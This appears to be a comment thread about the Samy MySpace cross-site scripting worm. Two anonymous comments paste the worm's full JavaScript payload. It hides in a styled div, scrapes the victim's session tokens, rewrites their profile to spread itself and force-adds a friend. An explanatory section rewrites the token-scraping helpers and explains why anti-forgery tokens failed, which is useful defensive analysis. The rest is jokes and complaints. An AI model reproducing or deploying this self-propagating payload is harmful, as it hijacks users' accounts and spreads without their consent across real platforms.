function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}
function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}
function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}
function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}
function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}
var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}
var AG;
function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}
function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}
function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}">


wonder what it is ;)

Re:maybe... (0)

Anonymous Coward | about 9 years ago | (#13790252)

erherm, i mean this
div id=my,code style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="
var B=String.fromCharCode(34);var A=String.fromCharCode(39);
function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}
function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}
function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}
function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}
function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}
function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}
function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}
function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}
var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}
var AG;
function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}
function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}
function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}
function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}
">div
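The part of the posted payload worth a second look is not the XMLHttpRequest plumbing but the three string-scraping helpers (findIn, getHiddenParameter, getFromURL): they pull the per-user Mytoken and the hidden hash / hashcode fields straight out of pages fetched in the victim's own session, which is why those tokens did nothing to stop it. What follows is an added example, not the thread's code and not the worm: a readable rewrite of those helpers with their behaviour kept, run against a constructed stand-in for the interest-edit page (invented markup and token values; the field names are the ones the payload reads). paramsToString here uses encodeURIComponent, an assumption in place of the payload's escape() plus manual '+' and '&' fix-ups.

```javascript
// Added example, not from the thread or the worm: the payload's token-scraping
// helpers rewritten readably, exercised on constructed HTML.

const DQ = String.fromCharCode(34); // '"' (the payload builds quotes this way as B)

// findIn: text between `start` and the next `end`, looking at most 1024 chars past
// `start`. Kept as in the payload, including its odd result when `start` is absent.
function findIn(haystack, start, end) {
  const from = haystack.indexOf(start) + start.length;
  const slice = haystack.substring(from, from + 1024);
  return slice.substring(0, slice.indexOf(end));
}

// getHiddenParameter: value of <input name="NAME" value="..."> as the worm read it.
function getHiddenParameter(html, name) {
  return findIn(html, 'name=' + DQ + name + DQ + ' value=' + DQ, DQ);
}

// getFromURL: value after NAME= up to '&', or up to '"' for Mytoken, which the
// payload therefore read out of an attribute value rather than the query string.
function getFromURL(text, name) {
  const terminator = name === 'Mytoken' ? DQ : '&';
  const key = name + '=';
  const from = text.indexOf(key) + key.length;
  const slice = text.substring(from, from + 1024);
  return slice.substring(0, slice.indexOf(terminator));
}

// Form encoding. Assumption: encodeURIComponent instead of the payload's escape().
function paramsToString(params) {
  return Object.keys(params)
    .map((k) => k + '=' + encodeURIComponent(params[k]))
    .join('&');
}

// Constructed stand-in for the page the worm fetched (not real MySpace markup;
// token values are made up). Same-origin XHR returns this to the running script.
const SAMPLE_RESPONSE =
  '<html><body>' +
  '<a href="/index.cfm?fuseaction=user.viewProfile&friendID=4242&Mytoken=ABC123-TOKEN">home</a>' +
  '<form action="/index.cfm?fuseaction=profile.processInterests" method="post">' +
  '<input type="hidden" name="hash" value="deadbeef0123"/>' +
  '<input type="hidden" name="hashcode" value="f00dcafe"/>' +
  '<textarea name="interest">Nobody yet</textarea>' +
  '</form></body></html>';

// Everything the payload needed from one response, in one place.
function harvestTokens(html) {
  return {
    mytoken: getFromURL(html, 'Mytoken'),
    hash: getHiddenParameter(html, 'hash'),
    hashcode: getHiddenParameter(html, 'hashcode'),
    friendID: getFromURL(html, 'friendID'),
  };
}

// The processInterests POST as the payload assembled it, given the victim's
// current "heroes" text. Returns null when the marker string is already present,
// which is how the worm avoided rewriting the same profile twice.
function buildProcessInterestsBody(html, existingHeroes) {
  if (existingHeroes.indexOf('samy') !== -1) return null;
  const t = harvestTokens(html);
  return {
    url: '/index.cfm?fuseaction=profile.processInterests&Mytoken=' + t.mytoken,
    body: paramsToString({
      interestLabel: 'heroes',
      submit: 'Submit',
      interest: existingHeroes + ' but most of all, samy is my hero.',
      hash: t.hash,
    }),
  };
}
```

The lesson for anyone relying on per-request tokens: they defend against cross-site request forgery, where the attacker cannot read responses; here the attacker's script ran in the victim's origin and read them at will. Marking the session cookie HttpOnly would not have helped either, since the payload never touched the cookie; the browser attached it to every same-origin XMLHttpRequest automatically.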

gnaUa (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13790190)

members' creative from nOw on o8 non-fucking-existant. declined in market who are intersted

test (0)

Anonymous Coward | about 9 years ago | (#13790191)

This is a test of the <div> JS exploit.

STD (1)

Washizu (220337) | about 9 years ago | (#13790205)

Who didn't know that place was full of STDs? (Script Transmitted Diseases)

From the horse's mouth (1)

FluffyPanda (821763) | about 9 years ago | (#13790212)

You can read the (entertaining) description of the hack in his own words here:

Samy is my hero [fast.info]

Quick and Dirty solution (2, Interesting)

ajs318 (655362) | about 9 years ago | (#13790216)

My proposed "quick and dirty" solution is this.

<script type="text/javascript">
    for (var i = 0; i < 1000; ++i) {
        alert("Disable JavaScript for this site!");
    }
    alert("OK ..... Don't say you weren't warned.");
</script>

Now you can be sure that  {almost*}  nobody visiting your site has JavaScript enabled, so there is no chance of this affecting them.

* There probably is _somebody_ _somewhere_ who really is masochistic enough to click the thing 1001 times.  Their computer probably is infected with several viruses already, though.

With myspace popularity, comes the problems (2, Insightful)

British (51765) | about 9 years ago | (#13790227)

1. Embedded music videos. Anyone have a host list of the music video providers? I'd like to resolve them to 127.0.0.1
2. Bogus accounts. There is a huge rash of "stripper" accounts, consisting of minimal user info, that message single guys to get them to email them at their Yahoo accounts. They typically have 4 or 5 risque pictures, making everyone think all women are whores. Bad bad bad.
3. Myspace needs a "safe mode" where the excessively bad (bells and whistles) profiles that sodomize any web browser can be avoided.
4. Why does clicking to one of your groups have to open in a new window? WHY? The top-bar navigation makes that unnecessary.

But still, myspace is better than orkut. People actually use myspace.